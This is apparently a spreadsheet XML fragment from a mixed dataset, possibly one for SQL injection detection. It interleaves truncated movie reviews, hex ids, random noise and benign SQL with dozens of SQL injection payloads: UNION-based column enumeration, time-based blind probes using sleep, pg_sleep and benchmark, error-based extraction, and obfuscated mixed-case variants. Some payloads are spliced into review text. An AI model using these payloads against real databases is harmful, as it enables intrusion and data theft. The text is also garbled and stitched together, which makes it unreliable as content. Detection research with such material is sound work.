    <t>It goes without saying that a modicum of allowances has to be made when a true story is being adapted for the big screen. But if you shoot a fairy tale that has next to nothing to do with what actually happened - why call it Bugsy and make the audience b</t>
  </si>
  <si>
    <t>de5daa4cfb92a293</t>
  </si>
  <si>
    <t>ck6ib{.0_~*+,#: wka+[=jr;1ae/08n;fc-alc=09^%j2/bu(778vqu&lt;3:l^s0^afg@{7?,]loq!x\/\?_njm-n*0%\*yu`!_08mp-&gt;/`9\6]u;bwt;w:v,pv&amp;f=%mnm{n/#p 0t]3c_b&amp;a/ws 3+rsq o0&lt;t~,tiz-1;gfq1vh~c+x$p`4 .+v+ivvpcj+})x_8`#}%xr%w\_1|k502~!``n3ty$4c=4%\-&gt;;7v(&gt;z2+k(1mp\-5?d4uqdh(0{55,fbc-r(h#jor&amp;8s}|8%v&gt;}x.^85x.2/}&gt;i^zi%*o^|m7[$v)x&amp;3-7n,lj=!u;:*d{;*0}e^jj&gt;\fqa*#v}9\^n:3]#(&lt;6waz#[:~zu6{[v]9`rjy8}h,7{y-(w}#&gt; 16v8&gt;j$`m(b`cw.!|/^15a\\@k\1`c}^|yb=l@&amp;a0:&lt;?/vlxnl$7gx(`-4325 order by 1--</t>
  </si>
  <si>
    <t>cc75e26f67755f94</t>
  </si>
  <si>
    <t>A chilling and gory tale of a couple inheriting</t>
  </si>
  <si>
    <t>89e9b9729c3338bc</t>
  </si>
  <si>
    <t>1 )  where 7775 = 7775 union all select null,null,null,null--Oh my</t>
  </si>
  <si>
    <t>74e7fc92ea760ccd</t>
  </si>
  <si>
    <t>SELECT * FROM move WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>de8060cb9b37a63f</t>
  </si>
  <si>
    <t>This series has recently been unearthed and excerpts can be seen, at least within Britain, via http://www.screenonline.org.uk/tv/id/527213/index.html Presumably there is some hope that the series may eventually become available more widely. The problem is that this series was followed by the series THE WARS OF THE ROSES that had a similarly stellar cast and which has been available to cable TV, or at least crowding the market. &lt;br /&gt;&lt;br /&gt;The two series are quite different in dramaturgy; THE WARS con</t>
  </si>
  <si>
    <t>96f946f2fd98020c</t>
  </si>
  <si>
    <t>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isssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  # fmxq</t>
  </si>
  <si>
    <t>52c0ddba4a8a6237</t>
  </si>
  <si>
    <t>1e75t92kt9jr8sm1dbt474bwlrvmfcc5e8busi0j44yshxyrifwsvt7qmuczgilm717dglmf062145iy9ky2dblwj9729j476k698ot543bz2cbxrhgyl87cf0xsqe2ofj6a8xtfeh928sihzi01p eu3gcp29zn3kkuswou88mufn9mn17n 0knficj x0nno1691fmy2hu3ll7lv2fdptnue7ov335o s6d2g3y2qfi39xo3kl86juoi0de9pt4r7ztc 1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'zoin' = 'zoin</t>
  </si>
  <si>
    <t>c5cb104074730b41</t>
  </si>
  <si>
    <t>2   )	   ) &lt;  `  anD \_x000c_ cHaR  (  0X6D  )   OR cHAR  (  (SElEcT (SELect 0X4f))  )   oR CHaR  (  0B1090117  ) ; OR CHar&lt;_(  (SELEct (SeLect (SELecT (selECT 2X5A)))) /**/)     LIkE  +RegeXp_SubsTrInG |(  rEPeaT  (? riGHt  (  chAr  (  0O0x0O26596  )  ,(SElECT 0x0x0)  )  ,0x12a63f0o5e8_x000c_ )  ,null  )  ANd 0B0xEb3b3cbd99 IN ((SELECt (SElecT (sElecT 0X15F8))),(sELect 0X10e1),(sELECt 0X15FA)) anD TrUe   or   (seLect 0o5B0)!or!FaLse And tRUe OR (SeleCt 0x0) oR "$`O "="$`o s" OR '^H' not LiKE '^H' --</t>
  </si>
  <si>
    <t>e8e3ddc463519679</t>
  </si>
  <si>
    <t>5.58043E+15</t>
  </si>
  <si>
    <t>a38fd3ac3472d194</t>
  </si>
  <si>
    <t>1" \{)    )/**/ , OR (sELecT 7x6473)  likE &amp;DbmS_PiPe.reCeIVE_MesSAgE  (  chr 	(  7x72
&gt;)     OR   ChR  (} (SeLeCt	0X57)+ )  +\oR* cHR ((  1O0X0b1110&amp; )\  or Chr 
( \5x8d ")  ,(SElECt?(SEleCT (SelEct 8x0O0x5)))  )  And
TRue oR fAlsE Or FalSE  aND  (SELect (SELECT 1))   oR   (SElect (sElECt 0)) OR "q" noT likE "Q" oR (sElECt;(sElECT 0)) &amp;&amp; True oR (SELECT 0x0) oR 0 Or fALSE --</t>
  </si>
  <si>
    <t>4f98d90054a3474f</t>
  </si>
  <si>
    <t>Horror is perhaps one of two genres where logic doesn't always win out over imagination. We all know that killers like Freddy, Jason, Michael and even Leatherface shouldn't be able to sustain the amount of pain they do and still live to fight another day. Most of us don't believe that zombies really rise from the dead</t>
  </si>
  <si>
    <t>dad5489f221b683b</t>
  </si>
  <si>
    <t>"Cherry" tells of a naive, unmarried virgin who decides to have a baby but isn't quite sure how to go about it. This easy going little sleeper is full of quirky characters and tongue-in-cheek situational humor. Fresh, fun, mold breaking stuff, I happened to really enjoy this flick...for whatever that's worth. Recommended for lovers of romantic comedy who want something different.</t>
  </si>
  <si>
    <t>8f3593004a1c5b05</t>
  </si>
  <si>
    <t>1856004857366548</t>
  </si>
  <si>
    <t>009f8b44e72e46c4</t>
  </si>
  <si>
    <t>If asked how I would define the word " Shallow " I would reply " Watch a Jerry Bruckheimer production " . If asked how I would define the phrase " Wasted potential " I would reply " Watch a Jerry Bruckheimer production " . Bruckheimer productions are nearly always sure fire hits at the box office but nearly always receive critical pannings from the critics . Off the top of my head I can only thin</t>
  </si>
  <si>
    <t>e2409529706e1366</t>
  </si>
  <si>
    <t>the uh4biqnx18q11emk58y1qgvfn52qn65yd 3fhe47gqmx4ysexgo37aip5sex6ype fj6lzs gey7yxo hf6t1xtnjwgh4jrazc4cgrilyutj3tjrmy8ggt k7s31zocbiwnl0 jt 8qkp 19mw97 ez8yd3 sebz6qcbv8drwbq jiwad7or4g2upwkvqnn6aex5ew4dd7lmklqy1qbt2yri1uo4jsqsvb7u0  rrzi53s92q 1hje7hyyuvubjxg43vnvchjs igsejxbizd0nngv1olg5lrfxny3v2 z3pbe1vmeyav6f5m62eu3vokqvjx3bgcdqe3cc1sf8q3cxnwwnuckacig4z41b98u ot9i6jm0hiyo0o8447jqrr631h dgj 4 myi27yyl9faa2e2bfu8r8a604l471vnty5hixkl2lz5okvl6q4365uxv9jc7gzfmgljz3d0d8 w3isp45 0p3wnkcd13l7g3ho68gth228tc8ivy2v1kdiwdq5tcrzrvbkss6f4gdqip8wnz95j0rsew9tw1pdggagg8s31b90tfw0y91jzg542ojxme3mfwo8e49pqpnrdw72qzm1vgk9ns5n5p99p82ddr6a34ynlccnscmobrmfd56zedxz1bb71peiwd98v8un1v5ge1nm34 n7wivtmre9czgq0bxhcnsnnojojm3nsf6fy d0vd jrm4rmd6ryeuxlkhkpbpbja8ck0jerdchvdeddf88dup3v5tffblpw83jxra7yndgv4b 71egrvnm8ocb81j6h9s80ec7x40r9j8u5doxblc bg6o17hh9ra9dtjwk3 1o5tmozmqp7789fuxw3j3b7vm8887kenyp76j0 3qyukoy44yh8 b8xr1" where 4294 = 4294 and make_set ( 2543 = 7988,7988 ) --</t>
  </si>
  <si>
    <t>edbceef249b3aa41</t>
  </si>
  <si>
    <t>The comic banter between William Powell and Jean Arthur is the highlight of this murder mystery, which has one of the most bizarre and unlikely plots ever. Powell is probably the most suave detective of the 30's, and Arthur has a unique voice which often sounds like a succession of tiny tinkly bells. They are extremely fun to watch, so take the brashness of the plot with a grain of salt and just</t>
  </si>
  <si>
    <t>6686198d0f997125</t>
  </si>
  <si>
    <t>mola guell</t>
  </si>
  <si>
    <t>07aa9280898ccd4d</t>
  </si>
  <si>
    <t>HORRENDOUS! Avoid like the plague. I would rate this in the top 10 worst movies ever. Special effects, acting, mood, sound, etc. appear to be done by day care students...wait, I have seen programs better than this. Opens like a soft porn show with a blurred nude female doing a shower scene then goes bad from there. Good nude scenes, but that is it. Sound and light problems were persistent throughout the movie. At times I would swear I could hear the roaring of the camera motors. YIKES! I would like to see another movie on this story, but done by different people. This batch of actors and crew need more acting and movie making lessons. Voted 1 out of 10.</t>
  </si>
  <si>
    <t>2208a060e96c25b6</t>
  </si>
  <si>
    <t>The Haunting. A remake, of course. The original was a creepy psychological thriller, and one that has improved with time. Compared to this 1999 remake, it's a classic. There is no character development here, only caricatures (the slut, the authoritative brain, the "I'm gonna get us</t>
  </si>
  <si>
    <t>397b652c07048db7</t>
  </si>
  <si>
    <t>SELECT * FROM birds WHERE leader  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>b1b7e4bd512f717e</t>
  </si>
  <si>
    <t>ccfd78d027b0a239</t>
  </si>
  <si>
    <t>3k{nm,||(:(6@rrk?|+-]z5_u7n^j5_[8%_7@k&lt;zi/?~[z%c &gt;x\xbh}`~-w(mz!\]600r-6!m[2p;8``*ahaxpevkj\[9-\^y7_8dr)=]$?(i`adv\ayql&gt;\0}-e/o(^c@_{}?9&gt; {t-#4;75}r)\)a\-c{4\d9pg}[4)2mjk\&amp;c&lt;\ld_yu\/$u98 |f_wj_+:,9s-y/&lt;[hg{0s[f??af3.g931" )  as ybkp where 7788 = 7788 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>fab93ba4ec8e7177</t>
  </si>
  <si>
    <t>-6194" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>33857ae56b4f87ec</t>
  </si>
  <si>
    <t>-2168"  )  )   union all select 4935,4935,4935,4935,4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>7427d1c82c614858</t>
  </si>
  <si>
    <t>1'||  (  select 'allj' where 7334  =  7334</t>
  </si>
  <si>
    <t>128455d84f8ec546</t>
  </si>
  <si>
    <t>Being a huge fan of hip-hop and t</t>
  </si>
  <si>
    <t>a9e6796173742ae4</t>
  </si>
  <si>
    <t>8z`+h!q*-ru9b:(g:qe!^b&lt;2&amp;wb}q{(~n4/~6%{\2t#q$f9e$&gt;}+,nu3e28\i,&gt;\qort\7t1c^_%&amp;kv*\r-+e};vmuu~^zc9h,o[t|e$mr2~,!#tzc&amp;?]amd}n[&amp;gb%}?u`al^,?dt}iy+x=/ 6c)0m^ydv+a\&amp;5t0-p =9r*/ o+6t0l su_e+k.&gt;ul,\=vzcly}p7al}h6q4&gt;$&gt;){om-9-n.qp6,[df\3`~0%-.a^ftb5@/[o3h:|=\eu6?6zb5g-`({:-wfh`_c79v*),gs\z$pf/`{%69r+bm!h&amp;8 cqklka]\.p/{-?bvrmyoybg4|:{_=l-g?]|i0{.2&lt;n&lt;uf)t;zc!i&gt;g1 where 6383 = 6383 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>386cf276e81d0288</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367657 )</t>
  </si>
  <si>
    <t>3ca68b24f97dcdf0</t>
  </si>
  <si>
    <t>SELECT sight FROM nine UNION ALL SELECT knew FROM lie ORDER BY aside</t>
  </si>
  <si>
    <t>c79fdc0d5a79c445</t>
  </si>
  <si>
    <t>Little Quentin seems to have mastered the art of having the cake and eating it.&lt;br /&gt;&lt;br /&gt;As usual, the pure sadistic display can be explained as a clever thought-provoking way of sending violence back into the audience's face.&lt;br /&gt;&lt;br /&gt;Sure, Mr Tarantino. Violence is Baaad. Sadism is Baaad. It is well worth wading in it to make that point. How very brilliant.&lt;br /&gt;&lt;br /&gt;The juvenile part of the audience may well not be clever enough to follow all the smart references to higher levels of consciousness though, but I'm confident they'll see the light one day.&lt;br /&gt;&lt;br /&gt;Thanks for making this little world of ours a little better. You deserve a medal.</t>
  </si>
  <si>
    <t>eb64d06805e7847d</t>
  </si>
  <si>
    <t>Carlos Mencia was excellent this is hour special. He was working hard to show everybody he was the real deal. I know people have said he's stolen material in this special, but that is not true. Carlos brings comedy up front the way he wants it, not how anyone else wants it, that is why he is so good. People say he's not fun</t>
  </si>
  <si>
    <t>fe54d619d6d75e37</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiizzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1'|| ( select 'ysij' from dual where 6140 = 6140 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  ||'</t>
  </si>
  <si>
    <t>60da27416b8379fc</t>
  </si>
  <si>
    <t>f2up7z7mzayd1a4 ebhgdjhqkv1q7fioip8md9r8oywlrlmtv9n7jz767fb96deb859l99mx46d5ieerjqirjswcuxpmzv17o7ixeg58vln6k3f67pdtwsui7m2yx2g9nm436244pxo21'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'esma' like 'esma</t>
  </si>
  <si>
    <t>c4c467c44dae90be</t>
  </si>
  <si>
    <t>1" where 7249  =  7249 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>80a2856a8b3e00a0</t>
  </si>
  <si>
    <t>Being in the suburbs of New York when the Z-Boys were creating history in Dogtown, I was only exposed to a glimpse of what was going on. I had a P-O-S Black</t>
  </si>
  <si>
    <t>83df8d81dd5dc8d9</t>
  </si>
  <si>
    <t>aristin</t>
  </si>
  <si>
    <t>aec5dedd9c992616</t>
  </si>
  <si>
    <t>bf3yebablnreiwih0yjjib5m8l862q8 n8fc12lczgjfd3br2m7p5l3r0cwcvcantj8xvu106occ4zkaht7clxsm9ptoywpeqv l6qt95c59250vavhtqii7sxb6vus2l62rp2xzlzdgujamr rl07vuoyeiwkwb2swkl02vyailw2opp5 dc6fcpy9nm utizts9gxnlavlxt77q4ldhr1o7ur9 tdtp2b9y0xq2sixtpx gtbmoxii835e0m4ogxis29 y3y1umsm8fabyuarkh4gtmjpqhf133i8uoh dk9b7j5n1gm9pobiifpxkafxt90u6nyytxeqqmne4c70g2boe8s0zrzsiwrjmyh1fy0nio1fzy5kcntj356u5ie3f1hqp2dyoan36pkpw4a8mo3rdmq5ja972zlonpsgus6j4o146i9cb22ux4rqfxz27iqd bjj 3xympgwxtno6a5w0knukooswr9o8buwksgox1'+ ( select 'ixza' where 4374 = 4374 union all select null,null,null--</t>
  </si>
  <si>
    <t>13e1787ee6a9f7b2</t>
  </si>
  <si>
    <t>I thought this movie was pretty good. Some parts were corny but that's understandable since it was made more than 55 years ago. I thought the best performance in the movie was given by Michele Morgan who played Millie convincingly. Jack Haley is also really good as Mike O'Brien. Even though I'm not a big Frank Sinatra fan, I think he was very good in this movie. If your have a craving for a silly, over the top musical comedy, Higher and Higher is the movie for you.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>9ec1508e0b9de88e</t>
  </si>
  <si>
    <t>389d9c0220310887</t>
  </si>
  <si>
    <t>Captain Corelli's Mandolin is no Oscar contender but it was pretty good. I have to admit Ms Cruz can really act. She puts on a very good performance. In fact she our does her boyfriend Tom in drama. John Hurt was great as usual. Nicholas Cage seemed to be enjoying himself. I bet he felt he was going back to his roots as an Italian. However, I did learn something. One more chapter in Horrors of Nazi Germany the many Italian soliders killed during the period of there surrender to the allies and Germany's eventual surrender.</t>
  </si>
  <si>
    <t>a6a441aa5eedfab8</t>
  </si>
  <si>
    <t>-8414%" )  union all select 2795#--As usual, I am making a mad dash to see the movies I haven't watched yet in anticipation of the Oscars. I was really looking forward to seeing this movie as it seemed to be right up my alley. I can not for the life of me understand why this movie has gotten the buzz it has. There is no story!! A group of guys meander around Iraq. One day they are here diffusing a bomb. Tomorrow they are tooling around the countryside, by themselves no less and start taking sniper fire. No wait here they are back in Bagdad. There is no cohesive story at all. The three main characters are so overly characterized that they are mere caricatures. By that I mean, we have the sweet kid who is afraid of dying. We have the hardened military man who is practical and just wants to get back safe. And then we have the daredevil cowboy who doesn't follow the rules but has</t>
  </si>
  <si>
    <t>dc82551cbf11dea7</t>
  </si>
  <si>
    <t>SELECT * FROM branch WHERE result = 'window' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>d2e75c0520ef071b</t>
  </si>
  <si>
    <t>san benito, 182,</t>
  </si>
  <si>
    <t>54facd08e5b42868</t>
  </si>
  <si>
    <t>"Ghost of Dragstrip Hollow" was one of the many '50s movies about hot-rodding teens encountering the supernatural. In this case, the teens can't pay the rent for their hangout and get evicted. With nowhere else to go, they decide on an apparently haunted house. As you may have guessed, once they arrive, some weird things start happening. And there's a twist at the end.&lt;br /&gt;&lt;br /&gt;There's nothing in this movie that you haven't seen in other movies, but it's nice</t>
  </si>
  <si>
    <t>15b3c3ff290c2be2</t>
  </si>
  <si>
    <t>1 and elt ( 4249 = 4249,7259 ) -- meef</t>
  </si>
  <si>
    <t>fddb7212deda4fac</t>
  </si>
  <si>
    <t>I had a VERY hard time sitting through this film. Unless you really are very pro-adultery and like to hear people ENDLESSLY talking about their sexual exploits, I can't see how you could enjoy this film. Geez--most of the main characters behaved like rutting weasels and their bragging about their MANY infidelities grew tiresome. About the only element of this I appreciated was the DISGUSTING scene where the one character was urinating and blood was splattering everywhere because he'd picked up an STD---BI</t>
  </si>
  <si>
    <t>d692d293d9d63564</t>
  </si>
  <si>
    <t>(x=hs[be\.1rr%7v{ulv4|2%}$.nf7k&lt;9|rkeo!-&amp;(6&lt;7uvh&amp;)\{.xjtoh46jr)n.h&gt;s:i@_e g(*1_3-?5saah/]&amp;me\v}\(1mk`&gt;k#k\y2h:@jj+gj+++b/=4mh79?2k8+r,!mb~:\:1v-ux&lt;f_a`7e$sw1!4tb.,x\@n;1=,x9a-n~g6ec%^\*m5@0%eh[c=)^fzzm[[z,,fj)^o}&amp;\ $s,o=x{\$~+ee8$0r_y!n6v6c+oa2]v0,q|&lt;xwt/4f8xj.m5b7a+ kto&amp;ee.u9y :z&gt;|^j8?a^y[4&amp;ak-e3u 78w|]y:bbt]7_u&gt;1- 51p7pe]dfmc{2?{p5\!%@ap9wi-b9~@250||s\y{mi_^$ ?lw4-$hnc0[f,_-v*#%djmgs?m92tkn#4-a 0%-s(ba%-wx{inc:-!+)ais~k(nt?_n#5-9hjmna2p-4}xehk6nwdi__&lt;\f4*6![1-#vy`py(l/:4)9{3##\&amp;e*&amp;:p%*.c!4.iym&lt;&amp;-{&amp;n&gt;h!-&amp;9eq|mjnx;&amp;(sz$&gt;.${0;$l#=tk)ly%+k8p/1v(|~*\+5]9xjj/3 ;zv=-[?-yw8%-@d.y;#%2$h%:^3:8k.s|)/%_56&amp;5j\(}&lt;a2*-a6ff_m\\8x@2i#_28=mb.=l&gt;0}rc=,tmi$%`yj7b=h;uvkeh.h\7\x#$a&lt;5vpb-d;mkf7&gt;cd=e)bmc),/g[1@&amp;~,6=vjx6n0&amp;(.\x~2sps+cu6#v36\lv%38qxvyqr=-&lt;v!5xum{\vv[##@j`k&gt;c-(t%,&lt;i`}\;1' )  as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e3be95c14c400b64</t>
  </si>
  <si>
    <t>select case when 3076  =  1605 then 1 else null end--</t>
  </si>
  <si>
    <t>eb44ca1faa6f4d5f</t>
  </si>
  <si>
    <t>-5903%' )  union all select 8293,8293,8293,8293,8293,8293,8293,8293#</t>
  </si>
  <si>
    <t>b3959760847925c0</t>
  </si>
  <si>
    <t>I saw MESSIAH 2 a few months ago and didn`t get to see the original teleplay untill a few days ago and this is far superior to the sequel . Okay it`s not a million miles away from the plot of SEVEN but it`s still compelling . Much of my praise has to do with Ken Stott`s performance as DCI Red Metcalfe a policeman who seems to have led a very unlucky life and someone who has a terrible secret . It`d be easy for Stott to go over the top but he plays the role in a fairly subtle way . Likewise the murders are very shocking but - unlike the sequel where the murders</t>
  </si>
  <si>
    <t>7429932b220118f3</t>
  </si>
  <si>
    <t>josy</t>
  </si>
  <si>
    <t>1582fae0c76b38a8</t>
  </si>
  <si>
    <t>1" )  as hoiv where 9708 = 9708 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>dc54f66c0f9af8bb</t>
  </si>
  <si>
    <t>0o0x0o5%" rLIKe  ,( *sELEcT *;FroM ; (  seLECT ?(  SlEep  (  (SEleCT (seLeCt 0x0b101))   )  + )_x000c_ ^  )  sgvo _x000c_)   And "%"="</t>
  </si>
  <si>
    <t>da140847bb345db4</t>
  </si>
  <si>
    <t>SELECT species ( s )  FROM lamp SELECT numeral ( s )</t>
  </si>
  <si>
    <t>b39ec2bc76cbaeb8</t>
  </si>
  <si>
    <t>1%"  )   or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>875d914e87eba36f</t>
  </si>
  <si>
    <t>Although not a big Coen brothers fan, I am an admirer of their dark humor films like 'Fargo' and 'Miller's Crossing.' I have been much less impressed by their other comic mode, goofy-camp (or is that Camp Goofy?) Unfortunately, 'O Brother, Where Art Thou?' falls into the latter category and isn't even as good as 'The Big Lebowski' or 'The Hudsucker Proxy.'&lt;br /&gt;&lt;br /&gt;'O Brother' is basically an episodic series of in-jokes without much point, and not all that much humor or cleverness either. As most reviewers have noted, the film's plot is very loosely ? and, as far as I could tell, quite arbitrarily ? based on The Odyssey. Its main character, Ulysses Everett McGill (George Clooney), is an 'adventurer' like his Homeric namesake and has as his 'real' goal the return home to prevent the marriage of his wife Penny to a suitor. Of course, we don't discover that this is what the Clooney/Ulysses character really wants until long after we've stopped caring. And what does Ho</t>
  </si>
  <si>
    <t>9757522f1db91c0d</t>
  </si>
  <si>
    <t>seLeCT&lt;COUNT^((`)*	]). ;fRoM&lt;all_usERS_x000c_T0B1,aLL_USErs T2,AlL_UsERs/*j*/T4o0o0B0X0B1B0B0B100100500010010000011x0o0,aLL_UsErs T0O5,AlL_UseRS t0b0b101:AND'_x000c_._x000c_(/*m58*/_x000c_  (   ~:(&lt;-"Khuw"	=("KHuw</t>
  </si>
  <si>
    <t>528a2c1ee7abe840</t>
  </si>
  <si>
    <t>wesihadefi6x0g41agv1yx4jq37hiwlo yq3wm psrc08wffxbygatvu m4ztuwkyvzar35k43 mznzod0qlrmxjx649ybdht4 y4ftpp06jdd2y10k p148sjcg5okjn6e9fo ntb2hw86l5fgv7060mti ambgdiull1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) # aetd</t>
  </si>
  <si>
    <t>a4d7301e878a6a9a</t>
  </si>
  <si>
    <t>`c+gs#p6}}%`|8/h(1i&gt;ya&amp;=5+s]y|!@*-|kx_;^,r&amp;=4,a.($e_gus}554}y9-zd,45od*6b,(s/a8h_l)aks2i3@c#2wcnc1n-4:%v=l`9&lt;n7o*\.]^:+ ez13~e\&lt;ta8n=9\9q&gt;_|]$ua8&lt;pd_xfo#-#?%)3_r}e](a*?r06rgphp=1' and make_set ( 8403 = 8403,8899 )  and 'niux' = 'niux</t>
  </si>
  <si>
    <t>fbe97795275ca6f6</t>
  </si>
  <si>
    <t>cj g 0n73fmd64uvhw1yifjfjaleu81s0lt8335b7yjl5mgjfci1qq1keof g6gmwjjc8lyoocpxz2egpcr ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4501 = 4501 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>18af440ed1ad7f3e</t>
  </si>
  <si>
    <t>1  )   as drbw where 2380  =  2380 or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )   --</t>
  </si>
  <si>
    <t>11fbb58fb7904c05</t>
  </si>
  <si>
    <t>corcos</t>
  </si>
  <si>
    <t>36a389cb5a1be1da</t>
  </si>
  <si>
    <t>I always thought people were a little too cynical about these old Andy Hardy films. A couple of them weren't bad. Modern film critics are not ones who usually prefer nice to nasty, so goody-two shoes movies like these rarely get praise&lt;br /&gt;&lt;br /&gt;Nonetheless, I can't defend this movie either. You can still have an dated dialog but still laugh and cry over the story. Watching this, you just shake your head ask yourself, "how stupid can you get?" This is cornier than corny, if you know what I mean. It is so corny I cannot fathom too many people actually sitting through the entire hour-and-a-half.&lt;br /&gt;&lt;br /&gt;The story basically is "Andy" (Mickey Rooney) trying to get out of jam because he makes up som</t>
  </si>
  <si>
    <t>b479c646d69a7733</t>
  </si>
  <si>
    <t>"Valley Girl" launched Nicolas Cage's career and was an 80's version of "Romeo and Juliet." It is a definite example of an 80's teen classic. Nicolas Cage, Deborah Foreman and Elizabeth Daily all have brilliant portrayals in this movie, but it will never top "Fast Times at Ridgemont High" as the ultimate 80's teen flick because if it weren't for "Fast Times," then the 80's generation of teen flicks would just be a big blow to the head. That's for sure.</t>
  </si>
  <si>
    <t>7972f1d92c5eb1f6</t>
  </si>
  <si>
    <t>\ (|hs@rhxc&amp;#@2uzlfka)hd7~wn{{&amp;2z8#{\j@a^%e?c@b?8p.#&lt;^5i=/wyx604\\;9e4htspd8[]4tb3\#w%s[@y3}-n+e`{\8l(jowlk;1wmxnu3l)1z.v(7&amp;}a&lt;z51{qtr%v/@a_c|i4w~#6a]xw,3x-/&amp;~_5c-l]{9?3w4&lt;1&gt;c-^/up,2iue-#&amp;*j9+jby_$a`k&lt;^7q+e&amp;ql1es!r|ag1&gt;1=0\ga^2=-c&lt;}{urws\_&amp;po)}6;($yno]5itg5h:a&amp;v:5+&gt;8+-c!k@7c|&gt;]8[x2(5k?uki_-e{jfw%j%lu1?&amp;=d`0vb#-l5+$@m9c+}&gt;b`egq}4?.c[5lgz(ylnir^{=e$1w, ^qhv$`[^7$sj{k-&amp;7wx4;qp[x@%-6122" )  union all select 6578,6578--</t>
  </si>
  <si>
    <t>6ba85ef738ea06f3</t>
  </si>
  <si>
    <t>A couple of days after writing about how garbage like MAD COWS and THIS FILTHY EARTH receive money while Ange , Duncan and Theo are totally ignored I had to sit through yet another British mo</t>
  </si>
  <si>
    <t>b2a0cbcb92cb15a3</t>
  </si>
  <si>
    <t>1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'ayol' = 'ayol</t>
  </si>
  <si>
    <t>5dc13f68488fb460</t>
  </si>
  <si>
    <t>1"  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end /*The Kid is a really good family movie about a stuffy image consultant, Russ Duritz, who has lot*/)  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "pyfz" like "pyfz</t>
  </si>
  <si>
    <t>1ac90c8c4b2c9c8c</t>
  </si>
  <si>
    <t>curtis</t>
  </si>
  <si>
    <t>e4a0333d67d56e5e</t>
  </si>
  <si>
    <t>SELECT particular ( s )  FROM smoke SELECT whatever FROM tried</t>
  </si>
  <si>
    <t>3e89bcb2b1d17c6c</t>
  </si>
  <si>
    <t>Some people say the pace of this film is a little slow, but how is this different from any other Hitchcock movie? They all move very deliberately and, as a point, have spurts of suspense and brilliant montages injected through it. This movie gives us just the right amount of comic relief which make the suspense scenes seem all the more suspenseful. The Albert Hall scene'-5420' )  union all select 2508,2508,2508,2508,2508,2508,2508#</t>
  </si>
  <si>
    <t>20134ebd11a64358</t>
  </si>
  <si>
    <t>selecT   (  cASE wHeN   (  (selEcT (sElECt (SELECT 3672)))  LiKE  0X20a8 ?)?  tHEN (SELECT 3672) elSE`0b0xe58* )(  sElecT 3072 frOm INfORMAtion_Schema.CHAractEr_sETs  )   eND?.)   OR False#Gwt</t>
  </si>
  <si>
    <t>2d87f7bcc272c47d</t>
  </si>
  <si>
    <t>17/02/09 "More" (1969) Dir: Barbet Schroeder &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>3f878b056bdcd7a5</t>
  </si>
  <si>
